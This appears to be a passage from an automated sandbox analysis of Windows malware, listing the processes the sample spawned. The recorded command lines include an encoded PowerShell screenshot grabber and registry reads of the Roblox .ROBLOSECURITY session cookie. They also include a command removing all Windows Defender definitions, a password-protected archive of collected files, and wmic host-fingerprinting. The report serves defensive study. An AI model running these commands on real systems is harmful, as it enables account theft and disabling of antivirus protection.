                                                                                                                                                                                                                                      Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAg
ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:03:42:11
Start date:04/01/2025
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
Imagebase:0x7ff69afe0000
File size:2'759'232 bytes
MD5 hash:F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:03:42:10
Start date:04/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff7484e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:03:42:10
Start date:04/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff7484e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:03:42:11
Start date:04/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:03:42:11
Start date:04/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:03:42:11
Start date:04/01/2025
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff7dc7a0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:03:42:11
Start date:04/01/2025
Path:C:\Windows\System32\getmac.exe
Wow64 process (32bit):false
Commandline:getmac
Imagebase:0x7ff7fd0f0000
File size:90'112 bytes
MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:03:42:11
Start date:04/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff7484e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:03:42:11
Start date:04/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                      Target ID:52
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:53
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:54
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:55
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:56
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:57
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:58
                                                                                                                                                                                                                                      Start time:03:42:13
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
                                                                                                                                                                                                                                      Imagebase:0x7ff7c2690000
                                                                                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:59
                                                                                                                                                                                                                                      Start time:03:42:13
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:60
                                                                                                                                                                                                                                      Start time:03:42:13
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 61
Start time: 03:42:14
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 63
Start time: 03:42:14
Start date: 04/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 64
Start time: 03:42:15
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 65
Start time: 03:42:15
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 66
Start time: 03:42:15
Start date: 04/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 67
Start time: 03:42:19
Start date: 04/01/2025
Path: C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase: 0x7ff6a5480000
File size: 468'120 bytes
MD5 hash: B3676839B2EE96983F9ED735CD044159
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 68
Start time: 03:42:26
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 69
Start time: 03:42:26
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 70
Start time: 03:42:26
Start date: 04/01/2025
Path: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
Imagebase: 0x7ff6aa180000
File size: 630'736 bytes
MD5 hash: 9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 71
Start time: 03:42:27
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                      Target ID:72
                                                                                                                                                                                                                                      Start time:03:42:27
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:73
                                                                                                                                                                                                                                      Start time:03:42:27
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic os get Caption
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:74
                                                                                                                                                                                                                                      Start time:03:42:28
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:75
                                                                                                                                                                                                                                      Start time:03:42:28
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:76
                                                                                                                                                                                                                                      Start time:03:42:28
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:77
                                                                                                                                                                                                                                      Start time:03:42:29
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:78
                                                                                                                                                                                                                                      Start time:03:42:29
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:79
                                                                                                                                                                                                                                      Start time:03:42:29
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:80
                                                                                                                                                                                                                                      Start time:03:42:30
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 81
Start time: 03:42:30
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 82
Start time: 03:42:30
Start date: 04/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
